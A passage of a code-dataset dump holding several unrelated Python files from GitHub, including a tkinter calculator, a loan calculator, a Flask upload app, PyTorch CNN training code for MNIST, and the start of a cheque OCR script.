cv2.getRotationMatrix2D((cols/2,rows/2),theta,1)\n\t\timage = cv2.warpAffine(image,M,(cols,rows))\n\t\tyield image\n\ndef find_nn(gt,pick):\n\tdist = []\n\tfor (startX, startY, endX, endY) in pick:\n\t\tdist = np.append(dist,[np.sqrt(np.square(startX-gt[0,0])+np.square(startY-gt[0,1]))])\n\tidx = np.argmin(dist)\n\treturn pick[idx]\n\ndef bb_intersection_over_union(boxA, boxB):\n\t# determine the (x, y)-coordinates of the intersection rectangle\n\txA = max(boxA[0], boxB[0,0])\n\tyA = max(boxA[1], boxB[0,1])\n\txB = min(boxA[2], boxB[0,2])\n\tyB = min(boxA[3], boxB[0,3])\n\n\t# compute the area of intersection rectangle\n\tinterArea = (xB - xA + 1) * (yB - yA + 1)\n\n\t# compute the area of both the prediction and ground-truth\n\t# rectangles\n\tboxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)\n\tboxBArea = (boxB[0,2] - boxB[0,0] + 1) * (boxB[0,3] - boxB[0,1] + 1)\n\n\t# compute the intersection over union by taking the intersection\n\t# area and dividing it by the sum of prediction + ground-truth\n\t# areas - the interesection area\n\tiou = interArea / float(boxAArea + boxBArea - interArea)\n\n\t# return the intersection over union value\n\treturn iou","repo_name":"nihaarshah/RadarObjectDetection","sub_path":"code/sliding-window/pyimagesearch/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33682335147","text":"import tkinter as tk\n\ndef add_digit(digit):\n value = calc.get()#принимает значение, которое хранится в вводе\n if value[0] == '0' and len(value) == 1:#если 1-ое значение - 0 И длина значения = 1\n value = value[1:]#то этот 0 убирается\n calc.delete(0, tk.END)\n calc.insert(0, value + digit)\n\ndef add_operation(operation):\n value = calc.get()\n if value[-1] in '-+/*':#если последнее значение является операцией, то эту о��ерацию должны убрать из value, т.е. все что там лежит КРОМЕ последней операции\n value = value[:-1]\n elif '+' in value or '-' in value or '/' in value or '*' in value:#НО если или + или - или / или * уже есть в предыдущем выражении\n calculate()#то оно уже считывается\n value = calc.get()#и вновь получаем новое значение\n calc.delete(0, tk.END)#всё что было - очищаем\n calc.insert(0, value + operation)#к значению прибавляем новую операцию\n\ndef calculate():#функция содана для кнопки = для вычисления\n value = calc.get()#принимает значение, которое хранится в вводе\n if value[-1] in '+-/*':#если значение заканчивается на какую-то операцию \n value = value + value[:-1]#то к этому значению \"прибавляем\" это же значение(пример 7* = 49)\n calc.delete(0, tk.END)\n calc.insert(0, eval(value))#eval - функция для выполнения математических операций\n\ndef clear():#функция очищения\n calc.delete(0, tk.END)\n calc.insert(0, 0)\n\ndef make_digit_button(digit):#функция создана для кнопок от 1 до 9 и 0\n return tk.Button(text = digit, bd = 5, font = ('Arial', 13), command = lambda : add_digit(digit))\n\ndef make_operation_button(operation):#функция создана для кнопок операций\n return tk.Button(text = operation, bd = 5, font = ('Arial', 13), fg = 'red',\n command = lambda : add_operation(operation))\n\ndef make_calc_button(operation):#фунция создана для =\n return tk.Button(text = operation, bd = 5, font = ('Arial', 13), fg = 'red',\n command = calculate)\n\ndef make_clear_button(operation):#функция создана для кнопки очищения\n return tk.Button(text = operation, bd = 5, font = ('Arial', 13), fg = 'red',\n command = clear)\n \n\nwin = tk.Tk()\nwin.geometry(f\"240x270\")#размер окна\nwin['bg'] = '#33ffe6'#цвет фона(бирюзовый)\nwin.title('Калькулятор')#заголовок приложения\n\ncalc = tk.Entry(win, justify = tk.RIGHT, font = ('Arial', 15), width = 15)#создание поля ввода; создана функция justify для ввода чисел и знаков справа, указан шрифт и её размер\ncalc.insert(0, '0')#при запуске приложения и при очищении поля ввода будет отображаться 0 в виде строки \ncalc.grid(row = 0, column = 0, columnspan = 4, stick = 'we', padx = 5)#расположение поля ввода(его ряд и колонка), объединение колонок, растягивание слева направо и расстояние по x\n\n#кнопки от 1 до 9 и 0; для каждой кнопки указан текст, ряд, колонка, расширение и расстояние между ними\nmake_digit_button('1').grid(row = 1, column = 0, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('2').grid(row = 1, column = 1, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('3').grid(row = 1, column = 2, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('4').grid(row = 2, column = 0, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('5').grid(row = 2, column = 1, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('6').grid(row = 2, column = 2, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('7').grid(row = 3, column = 0, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('8').grid(row = 3, column = 1, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('9').grid(row = 3, column = 2, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('0').grid(row = 4, column = 0, stick = 'wens', padx =5, pady = 5)\n\n#кнопки операций +-/*; для каждой кнопки указан текст, ряд, колонка, расширение и расстояние между ними\nmake_operation_button('+').grid(row = 1, column = 3, stick = 'wens', padx = 5, pady = 5)\nmake_operation_button('-').grid(row = 2, column = 3, stick = 'wens', padx = 5, pady = 5)\nmake_operation_button('/').grid(row = 3, column = 3, stick = 'wens', padx = 5, pady = 5)\nmake_operation_button('*').grid(row = 4, column = 3, stick = 'wens', padx = 5, pady = 5)\n\n#кнопка вычисления =; для этой кнопки указан текст, ряд, колонка, расширение и расстояние между ними\nmake_calc_button('=').grid(row = 4, column = 2, stick = 'wens', padx = 5, pady = 5)\n\n#кнопка очищения поля ввода; для этой кнопки указан текст, ряд, колонка, расширение и расстояние между ними\nmake_clear_button('C').grid(row = 4, column = 1, stick = 'wens', padx = 5, pady = 5)\n\n#колонки будут занимать больше пространства по высоте и по длине\nwin.grid_columnconfigure(0, minsize = 60)\nwin.grid_columnconfigure(1, minsize = 60)\nwin.grid_columnconfigure(2, minsize = 60)\nwin.grid_columnconfigure(3, minsize = 60)\n\n#ряды будут занимать больше пространства по высоте и по длине\nwin.grid_rowconfigure(1, minsize = 60)\nwin.grid_rowconfigure(2, minsize = 60)\nwin.grid_rowconfigure(3, minsize = 60)\nwin.grid_rowconfigure(4, minsize = 60)\n\nwin.mainloop()\n","repo_name":"Ancienttttttttttt/ReCalculator","sub_path":"ReCalc.py","file_name":"ReCalc.py","file_ext":"py","file_size_in_byte":6409,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14388049038","text":"def main():\n print(\"This is a monthly payment loan calculator.\\n\")\n \n principal = float(input(\"Input the loan amount: \"))\n apr = float(input(\"Input the annual interest rate: \"))\n years = int(input(\"Input amount of years: \"))\n \n monthly_interest_rate = apr / 1200\n months = years * 12\n monthly_payment = (principal * months) / (1- (1 + monthly_interest_rate) ** (-months))\n print(\"%.2f\" %monthly_payment)\n \n \nmain()","repo_name":"Tharindu-Dasantha/CS","sub_path":"projects/20_projects/monthly_payment_calculator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37447119090","text":"# -*- coding=utf-8 -*-\n# @Time : 2022/8/18 16:35\n# @Author : Scotty1373\n# @File : test.py\n# @Software : PyCharm\nstd_in = '5 cats dog sand and cat catsandog'\n\nmax_lens = 4\nres_lens = 3\niss_score = [445, 754, 553, 122]\niss_prob = [89, 38, 76, 23]\n\ndef max_scores(max_lens, res_lens, iss_score, iss_prob):\n # 创建dp矩阵\n dp = [0 for i in range(max_lens)]\n\n mapping = []\n for i in range(len(iss_score)):\n mapping.append([iss_score[i], iss_prob[i]])\n\n # 按iss_score排序,并映射到iss_prob上\n sorted_id = mapping.sort(key=lambda x: x[0], reverse=True)\n\n counter = 0\n while counter < max_lens:\n if not counter:\n dp[counter] = mapping[counter][0]\n elif counter < res_lens:\n dp[counter] = mapping[counter][0] + dp[counter - 1]\n else:\n dp[counter] = mapping[counter][0] * mapping[counter][1] / 100 + dp[counter - 1]\n counter += 1\n\n print(f'{dp[-1]:.2f}')\n\nsub_str = 'redrde'\n\ndef getSubstringWithEqual012(string):\n N = len(string)\n\n # map to store, how many times a difference\n # pair has occurred previously\n mp = dict()\n mp[(0, 0)] = 1\n\n # zc (Count of zeroes), oc(Count of 1s)\n # and tc(count of twos)\n # In starting all counts are zero\n zc, oc, tc = 0, 0, 0\n\n # looping into string\n res = 0 # Initialize result\n for i in range(N):\n\n # increasing the count of current character\n if string[i] == 'r':\n zc += 1\n elif string[i] == 'e':\n oc += 1\n else:\n tc += 1 # Assuming that string doesn't contain\n # other characters\n\n # making pair of differences (z[i] - o[i],\n # z[i] - t[i])\n tmp = (zc - oc, zc - tc)\n\n # Count of previous occurrences of above pair\n # indicates that the subarrays forming from\n # every previous occurrence to this occurrence\n # is a subarray with equal number of 0's, 1's\n # and 2's\n if tmp not in mp:\n res += 0\n else:\n res += mp[tmp]\n\n # increasing the count of current difference\n # pair by 1\n if tmp in mp:\n mp[tmp] += 1\n else:\n mp[tmp] = 1\n\n return res\n\n\nmax_lt_lens = 5\nselect_lens = 2\nlt = [2, 3, 4, 5, 6]\n\ndef subarrayBitwiseANDs(A, max, sele):\n dp = [0 for i in range(10)]\n offset = 1\n for idx in range(max):\n for b in A:\n dp[idx] += 1 if b & offset else 0\n offset <<= 1\n dp.reverse()\n\n\ncity_num = 5\ncost_max = 3\ncity_cost = [(1, 3), (2, 1), (5, 2), (3, 1), (4, 3)]\n\ndef max_happy(cn, cm, cc):\n dp = [0] * (cn - cm + 1)\n city_cost.sort(key=lambda x: x[0])\n ptr_l, ptr_r = 0, cm - 1\n\n def cal_cost(left, right):\n cost = 0\n for i in range(left, right+1):\n cost += city_cost[i][1]\n return cost\n\n counter = 0\n max_hp = 0\n while ptr_r <= len(city_cost) - 1:\n happy_val = cal_cost(ptr_l, ptr_r)\n max_hp = max(happy_val, max_hp)\n dp[counter] = happy_val\n ptr_l += 1\n ptr_r += 1\n counter += 1\n print(max_hp)\n\n\n\nif __name__ == '__main__':\n # max_scores(max_lens, res_lens, iss_score, iss_prob)\n # print(getSubstringWithEqual012(sub_str))\n # subarrayBitwiseANDs(lt, max_lt_lens, select_lens)\n max_happy(city_num, cost_max, city_cost)","repo_name":"scotty1373/multiagent-ship","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15346942578","text":"# Sortieren\nnames = [\"Dieter\", \"Bernd\", \"Martin\"]\nprint(names, id(names))\n\nnames.sort()\nprint(names, id(names))\n\n# Aufsteigend Sortieren\nnumbers = [12, 3, 4, 99, 2, 0.2]\nnumbers.sort()\nprint(numbers)\n\n# Absteigend Sortieren\nnumbers = [12, 3, 4, 99, 2, 0.2]\nnumbers.sort(reverse=True)\nprint(numbers)\n\n# 2D Listen\npersonen = [\n [\"Arne\", \"Dudel\"],\n [\"Ali Ibrahim\", \"Yilmaz\"],\n [\"Deniz\", \"Gürzoglu\"]\n]\npersonen.sort()\nprint(personen)\n\n","repo_name":"aliibrahimyilmaz/Data_Science","sub_path":"02_Data_ANALYSIS_w_PYTHON/Python_Fundamentals/woche_1/tag_3/listen_3.py","file_name":"listen_3.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"10294791795","text":"import sys\nimport re\nimport os\nimport numpy as np\nimport pandas as pd\nfrom scipy import cluster\nimport uuid\n\n\nimport PCprophet.stats_ as st\nimport PCprophet.io_ as io\n\n\n# standardize and center methods\ndef center_arr(hoa, fr_nr=\"all\", norm=True, nat=True, stretch=(True, 72)):\n hypo = {}\n for k in hoa:\n key = hoa[k]\n if fr_nr != \"all\":\n key = key[0:(fr_nr)]\n if len([x for x in key if x > 0]) < 2:\n continue\n key = st.gauss_filter(key, sigma=1, order=0)\n key = st.impute_namean(key)\n if stretch[0]:\n # input original length wanted length\n key = st.resample(key, len(key), output_fr=stretch[1])\n key = st.resize(key)\n hypo[k] = list(key)\n return hypo\n\n\ndef split_peaks(prot_arr, pr, skp=0):\n \"\"\"\n split peaks in n samples giving skp fractions of window\n returns\n 'right_bases': array([32]), 'left_bases': array([7])\n \"\"\"\n peaks = list(st.peak_picking(prot_arr))\n left_bases = peaks[1][\"left_bases\"]\n right_bases = peaks[1][\"right_bases\"]\n fr_peak = peaks[0]\n ret = {}\n # if no return value or 1 peak\n if len(fr_peak) < 2:\n ret[pr] = prot_arr\n return ret\n for idx, pk in enumerate(fr_peak):\n if pk < 6 and pk > 69:\n continue\n nm = \"_\".join([pr, str(idx)])\n clean = fill_zeroes(prot_arr, pk, left_bases[idx], right_bases[idx])\n ret[nm] = clean\n return ret\n\n\ndef fill_zeroes(prot, pk, left_base, right_base):\n \"\"\"\n check left and right side of peaks and zero if >\n \"\"\"\n arr = prot.copy()\n arr[:left_base] = [0 for aa in arr[:left_base]]\n arr[right_base:] = [0 for aa in arr[right_base:]]\n right = zero_sequence(arr[pk : len(arr)])\n left = zero_sequence(arr[:pk][::-1])[::-1]\n return left + right\n\n\ndef zero_sequence(arr):\n idx = 0\n k = True\n while k:\n # if we are at end return array\n if idx == len(arr) - 1:\n return arr\n # if current value smaller than next (i.e increasing)\n elif arr[idx] < arr[(idx + 1)]:\n # slice until there\n tmp = arr[:idx]\n l = [0] * (len(arr) - len(tmp))\n return tmp + l\n idx += 1\n\n\ndef decondense(df, ids):\n \"\"\"\n decondense a linkage matrix into all flat clusters\n \"\"\"\n clusters = {}\n rows = cluster.hierarchy.linkage(df)\n lab = dict(zip(range(len(ids) + 1), ids))\n for row in range(rows.shape[0]):\n cluster_n = row + len(ids)\n glob1, glob2 = rows[row, 0], rows[row, 1]\n current = []\n for glob in [glob1, glob2]:\n if glob > (len(ids) - 1):\n current += clusters[glob]\n else:\n current.append(lab[int(glob)])\n clusters[cluster_n] = current\n return clusters\n\n\ndef format_cluster(hoa, clust):\n out = {}\n lk = {k: \",\".join(map(str, v)) for k, v in hoa.items()}\n for gn in clust.values():\n if len(gn) > 1 and len(gn) <= 100:\n gn = [x if x in lk else re.sub(\"_\\d+$\", \"\", x) for x in gn]\n out[\"#\".join(gn)] = [\"#\".join([lk[x] for x in gn])]\n return out\n\n\ndef collapse_prot(infile, use):\n prot = io.read_txt(infile, \"GN\")\n prot = center_arr(prot, fr_nr=use, stretch=(True, 72))\n prot2 = {}\n for pr in prot:\n pks = split_peaks(prot[pr], pr)\n if pks:\n for k in pks:\n prot2[k] = pks[k]\n pr_df = io.create_df(prot2)\n z = decondense(pr_df, list(pr_df.index))\n hypothesis = format_cluster(prot, z)\n hypo_df = pd.DataFrame.from_dict(hypothesis).T\n hypo_df[\"ID\"] = [\"cmplx_\" + str(uuid.uuid4()) for x in list(hypo_df.index)]\n #  return peaks2prot(hypothesis, prot),pr_df\n return hypo_df, pr_df\n\n\ndef runner(infile, hypothesis, use_fr):\n \"\"\"\n generate hypothesis from infile using all fract fractions and max hypo nr\n \"\"\"\n if hypothesis == \"all\":\n print(\"Generating hypothesis for \" + infile)\n hypo, df_s = collapse_prot(infile=infile, use=use_fr)\n base = io.file2folder(infile, prefix=\"./tmp/\")\n # nm = os.path.join(base, \"hypo.txt\")\n hypo.reset_index(inplace=True)\n hypo.columns = [\"MB\", \"FT\", \"ID\"]\n hypo = hypo[[\"ID\", \"MB\", \"FT\"]]\n hypo.to_csv(os.path.join(base, \"hypo.txt\"), sep=\"\\t\", index=False)\n # io.wrout(hypo, nm, [\"ID\", \"MB\", \"FT\"], is_hyp=True)\n df_s.to_csv(os.path.join(base, \"splitted_transf.txt\"), sep=\"\\t\")\n return True\n else:\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"anfoss/PCprophet","sub_path":"PCprophet/hypothesis.py","file_name":"hypothesis.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"2415653167","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef scatter_plot(X, y, theta, fname=\"lr-scatter.pdf\"):\n \"\"\"Plot the data and its linear regression model.\"\"\"\n plt.clf()\n plt.plot(X[:, 1], y, \"o\")\n x_e = np.array([[1, X[:, 1].min()], [1, X[:, 1].max()]])\n plt.plot(x_e[:, -1], x_e.dot(theta))\n plt.savefig(fname)\n plt.close()\n\n\ndef gradient_descent(X, y, alpha=0.001, epochs=1000, trace=False):\n \"\"\"For a matrix x and vector y return a linear regression model.\"\"\"\n theta = np.zeros(X.shape[1])\n for i in range(epochs):\n theta = theta - alpha * (X.dot(theta) - y).dot(X)\n if trace and (i % 10 == 0):\n scatter_plot(X, y, theta, fname=\"tmp/%03d.pdf\" % i)\n return theta\n\n\ndata = np.loadtxt(\"linear-0.txt\")\nX_train = data[:, 0:-1]\nX_train = np.column_stack((np.ones(len(X_train)), X_train))\ny_train = data[:, -1]\ntheta_star = gradient_descent(X_train, y_train)\n\nscatter_plot(X_train, y_train, theta_star)\n","repo_name":"BlazZupan/uozp-zapiski","sub_path":"gradivo/linear-regression-basic.py","file_name":"linear-regression-basic.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"30808369229","text":"from flask import Flask, render_template, request, jsonify\nimport json\n\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n with open(\"./static/data/basic_data_processed.json\", 'r') as load_f:\n load_dict = json.load(load_f)\n people = load_dict\n with open('./static/data/china-geo.json', 'r') as load_m:\n load_map = json.load(load_m)\n china = load_map\n return render_template('index.html', people=people, china=china)\n\n\n@app.route(\"/people/\")\ndef people(person_name):\n a = u'./static/data/person/'+person_name+'.csv'\n ls = []\n with open(a, 'r') as fo:\n for line in fo:\n line = line.replace(\"\\n\", \"\")\n ls.append(line.split(\",\"))\n for i in range(1, len(ls)):\n ls[i] = dict(zip(ls[0], ls[i]))\n return jsonify(ls[1:])\n\n\nif __name__ == '__main__':\n app.run()\n\n\n","repo_name":"Angeladadd/DataVizOfCPCCentralCommittee","sub_path":"孙晨鸽_516030910421_0428_src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14449142142","text":"import os\nimport socket\nfrom flask import Flask, jsonify, render_template, request, redirect, url_for, send_from_directory, flash\nfrom flask_uploads import IMAGES, UploadSet, configure_uploads\n\napp = Flask(__name__)\nphotos=UploadSet(\"photos\", IMAGES)\napp.config['UPLOADED_PHOTOS_DEST'] = '/mnt/azure'\napp.config[\"SECRET_KEY\"] = os.urandom(24)\nconfigure_uploads(app, photos)\n\n# Function to fetch hostname and IP address\ndef fetchDetails():\n hostname = socket.gethostname()\n addr = socket.gethostbyname(hostname)\n return str(hostname), str(addr)\n\n@app.route(\"/\")\ndef hello_world():\n return \"

    Hello, World!

    \"\n\n@app.route(\"/health\")\ndef health():\n return jsonify(\n status=\"UP\"\n )\n\n@app.route(\"/details\")\ndef details():\n hostname, addr = fetchDetails()\n return render_template('index.html', hostname=hostname, IP=addr)\n\n@app.route(\"/upload\", methods=['GET', 'POST'])\ndef upload():\n if request.method == 'POST' and 'photo' in request.files:\n photos.save(request.files['photo'])\n flash(\"Photo saved successfully.\")\n return render_template('upload.html')\n return render_template('upload.html')\n\n@app.route('/upload/')\ndef uploaded_file(filename):\n return send_from_directory(app.config['UPLOADED_PHOTOS_DEST'], filename)\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=5000, debug=True)\n","repo_name":"vmahdych/devops-python","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9482899109","text":"import numpy as np\nimport torch.optim as optim\nimport torch\nimport torch.nn as nn\nimport os\nimport matplotlib.pyplot as plt\nimport torchvision\nimport torchvision.transforms as transforms\nfrom typing import Tuple, Dict, List\n\nfrom utils import get_data_loader\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\n\ndef get_model(model_type, input_shape, num_classes):\n # Check if the specified model type is simple or complex\n if model_type == 'simple':\n # Define the simple CNN model\n model = nn.Sequential(\n nn.Conv2d(in_channels=input_shape[0], out_channels=32, kernel_size=3, stride=1, padding=1),\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, stride=1, padding=1),\n nn.MaxPool2d(kernel_size=2, stride=2),\n nn.MaxPool2d(kernel_size=2, stride=2),\n nn.Flatten(),\n nn.Linear(in_features=7*7*64, out_features=128),\n nn.Linear(in_features=128, out_features=num_classes)\n )\n elif model_type == 'complex':\n # Define the complex CNN model\n model = nn.Sequential(\n nn.Conv2d(in_channels=input_shape[0], out_channels=32, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(num_features=32),\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, stride=1, padding=1),\n nn.Conv2d(in_channels=64, out_channels=64, kernel_size=3, stride=1, padding=1, groups=64),\n nn.MaxPool2d(kernel_size=2, stride=2),\n nn.MaxPool2d(kernel_size=2, stride=2),\n nn.Flatten(),\n nn.Linear(in_features=7*7*64, out_features=128),\n nn.Linear(in_features=128, out_features=num_classes)\n )\n else:\n raise ValueError('Invalid model type')\n return model\n\ndef save_models(models: Tuple[nn.Module, nn.Module, nn.Module, nn.Module], directory: str) -> None:\n \"\"\"Saves the given CNN models to the specified directory.\n\n Args:\n models: A tuple of the 4 trained CNN models (simple MNIST, complex MNIST, simple Fashion-MNIST, complex Fashion-MNIST).\n directory: The directory to save the models to.\n\n Returns:\n None. The models are saved to disk.\n \"\"\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n simple_mnist_model, complex_mnist_model, simple_fmnist_model, complex_fmnist_model = models\n\n torch.save(simple_mnist_model.state_dict(), os.path.join(directory, \"simple_mnist_model.pt\"))\n torch.save(complex_mnist_model.state_dict(), os.path.join(directory, \"complex_mnist_model.pt\"))\n torch.save(simple_fmnist_model.state_dict(), os.path.join(directory, \"simple_fmnist_model.pt\"))\n torch.save(complex_fmnist_model.state_dict(), os.path.join(directory, \"complex_fmnist_model.pt\"))\n\n\ndef load_models(directory):\n # Load the trained models\n if torch.cuda.is_available():\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n \n simple_mnist_model = get_model('simple',(1, 28, 28), 10)\n complex_mnist_model= get_model('complex',(1, 28, 28), 10)\n simple_fmnist_model = get_model('simple',(1, 28, 28), 10)\n complex_fmnist_model= get_model('complex',(1, 28, 28), 10)\n simple_mnist_model.load_state_dict(torch.load(f'{directory}/simple_mnist_model.pt', map_location=device))\n complex_mnist_model.load_state_dict(torch.load(f'{directory}/complex_mnist_model.pt', map_location=device))\n simple_fmnist_model.load_state_dict(torch.load(f'{directory}/simple_fmnist_model.pt', map_location=device))\n complex_fmnist_model.load_state_dict(torch.load(f'{directory}/complex_fmnist_model.pt', map_location=device))\n return simple_mnist_model, complex_mnist_model, simple_fmnist_model, complex_fmnist_model\n\n\ndef train(model, train_loader, valid_loader, num_epochs=100, early_stopping_patience=5, lr_min=1e-4, lr_max=1e-2, weight_decay=1e-4):\n \"\"\"Trains a PyTorch model with cosine annealing learning rate scheduling and early stopping.\n\n Args:\n model: The model to be trained (a PyTorch nn.Module).\n train_loader: A PyTorch DataLoader for the training data.\n valid_loader: A PyTorch DataLoader for the validation data.\n num_epochs: The number of epochs to train for (default 100).\n early_stopping_patience: The number of epochs to wait for a improvement in validation accuracy before stopping training (default 5).\n lr_min: The minimum learning rate (default 1e-4).\n lr_max: The maximum learning rate (default 1e-2).\n weight_decay: The weight decay for the Adam optimizer (default 1e-4).\n\n Returns:\n The trained model (a PyTorch nn.Module).\n \"\"\"\n # Load the trained models\n if torch.cuda.is_available():\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n\n # Define the Adam optimizer\n optimizer = optim.Adam(model.parameters(), lr=lr_max, weight_decay=weight_decay)\n\n # Set the initial learning rate and the learning rate scheduler\n lr_scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, num_epochs, lr_min)\n\n # Set the criterion (loss function)\n criterion = nn.CrossEntropyLoss()\n\n # Set the number of epochs to train for and the early stopping patience\n num_epochs_to_train = num_epochs\n early_stopping_counter = 0\n\n # Set the best validation accuracy to 0\n best_valid_acc = 0.0\n\n # Set the model to training mode\n model.train()\n\n # Loop over the number of epochs\n for epoch in range(num_epochs):\n # Set the loss and accuracy for the epoch to 0\n epoch_loss = 0.0\n epoch_acc = 0.0\n # Define the device\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # Move the model to the device\n model = model.to(device)\n\n # Loop over the training data\n for data, target in train_loader:\n # Move the data and target to the device\n data, target = data.to(device), target.to(device)\n\n # Zero the gradients\n optimizer.zero_grad()\n\n # Forward pass\n output = model(data)\n loss = criterion(output, target)\n\n # Backward pass\n loss.backward()\n optimizer.step()\n\n # Update the loss and accuracy for the epoch\n epoch_loss += loss.item()\n epoch_acc += (output.argmax(1) == target).float().mean().item()\n\n # Update the learning rate\n lr_scheduler.step()\n\n # Set the model to evaluation mode\n model.eval()\n\n # Set the validation loss and accuracy for the epoch to 0\n valid_loss = 0.0\n valid_acc = 0.0\n\n # Turn off gradients for validation\n with torch.no_grad():\n # Loop over the validation data\n for data, target in valid_loader:\n # Move the data and target to the device\n data, target = data.to(device), target.to(device)\n\n # Forward pass\n output = model(data)\n loss = criterion(output, target)\n\n # Update the validation loss and accuracy for the epoch\n valid_loss += loss.item()\n valid_acc += (output.argmax(1) == target).float().mean().item()\n\n # Calculate the average loss and accuracy for the epoch\n epoch_loss /= len(train_loader)\n epoch_acc /= len(train_loader)\n valid_loss /= len(valid_loader)\n valid_acc /= len(valid_loader)\n\n # Print the epoch\n # Print the training and validation results for the epoch\n print(f\"Epoch: {epoch+1:2d} | \"\n f\"Train Loss: {epoch_loss:.4f} | \"\n f\"Train Acc: {epoch_acc*100:.1f}% | \"\n f\"Valid Loss: {valid_loss:.4f} | \"\n f\"Valid Acc: {valid_acc*100:.1f}%\")\n\n # If the current model has the best validation accuracy, update the best validation accuracy and reset the early stopping counter\n if valid_acc > best_valid_acc:\n best_valid_acc = valid_acc\n early_stopping_counter = 0\n # If the current model does not have the best validation accuracy, increment the early stopping counter\n else:\n early_stopping_counter += 1\n\n # If the early stopping counter has reached the early stopping patience, stop training\n if early_stopping_counter >= early_stopping_patience:\n num_epochs_to_train = epoch + 1\n break\n\n # Return the trained model\n return model\n\ndef train_all_models(\n train_batch_size: int,\n num_epochs: int = 100,\n early_stopping_patience: int = 5,\n lr_min: float = 1e-4,\n lr_max: float = 1e-2,\n weight_decay: float = 1e-4,) -> Tuple[nn.Module, nn.Module, nn.Module, nn.Module]:\n # Load the MNIST and Fashion-MNIST datasets\n mnist_train, mnist_valid, mnist_test = get_data_loader(\"mnist\", train_batch_size, shuffle=True, num_workers=4, pin_memory=False)\n fmnist_train, fmnist_valid, fmnist_test = get_data_loader(\"fashion-mnist\", train_batch_size, shuffle=True, num_workers=4, pin_memory=False)\n \n # List of models to train\n models_to_train = [\n (\"simple\", \"mnist\", mnist_train, mnist_valid),\n (\"complex\", \"mnist\", mnist_train, mnist_valid),\n (\"simple\", \"fashion-mnist\", fmnist_train, fmnist_valid),\n (\"complex\", \"fashion-mnist\", fmnist_train, fmnist_valid),\n ]\n \n # Train all models\n trained_models = []\n for model_type, dataset, train_data, valid_data in models_to_train:\n print(f\"Training {model_type} model on {dataset}...\")\n # Get the appropriate model\n input_shape, num_classes = (1, 28, 28), 10\n model = get_model(model_type, input_shape, num_classes)\n # Train the model\n model = train(model, train_data, valid_data, num_epochs=num_epochs, early_stopping_patience=early_stopping_patience, lr_min=lr_min, lr_max=lr_max, weight_decay=weight_decay)\n trained_models.append(model)\n \n return tuple(trained_models)","repo_name":"the-infiltrator/White-Noise-Analysis-for-Neural-Networks","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1454069716","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\nfrom numpy import newaxis\r\nimport numpy as np\r\nimport cv2\r\nimport os\r\nimport argparse\r\nimport time\r\nfrom region_detection import detectionClass\r\nfrom utils import load_image_into_numpy_array,region_ocr,skew_correction\r\nimport pytesseract\r\nimport tensorflow as tf\r\nfrom tqdm import tqdm\r\nimport json\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n parser = argparse.ArgumentParser(description='cheque-extract')\r\n parser.add_argument(\"--testImagePath\", type=str,dest=\"test_path\" ,help=\"Path of test Images\",default='./test/',action=\"store\")\r\n args = parser.parse_args()\r\n \r\n regionapi = detectionClass()\r\n\r\n labels =['Pay','Data','Amount','Rupees','AC','Signature','MICR']\r\n \r\n output_path = './output_file/'\r\n if not os.path.exists(output_path):\r\n os.makedirs(output_path)\r\n \r\n testImagePath = args.test_path\r\n \r\n fileName = os.listdir(testImagePath)\r\n \r\n for i in tqdm(range(len(fileName))):\r\n recognized = {}\r\n start_time = time.time()\r\n imr = load_image_into_numpy_array(testImagePath+fileName[i])\r\n \r\n imr = skew_correction(imr) # skewness correction\r\n \r\n boxes,classes,scores = regionapi.run(imr) # cheque region detection\r\n \r\n for row in range(len(classes)): \r\n \r\n width = boxes[row][2]- boxes[row][0]\r\n height = boxes[row][3]- boxes[row][1]\r\n \r\n if 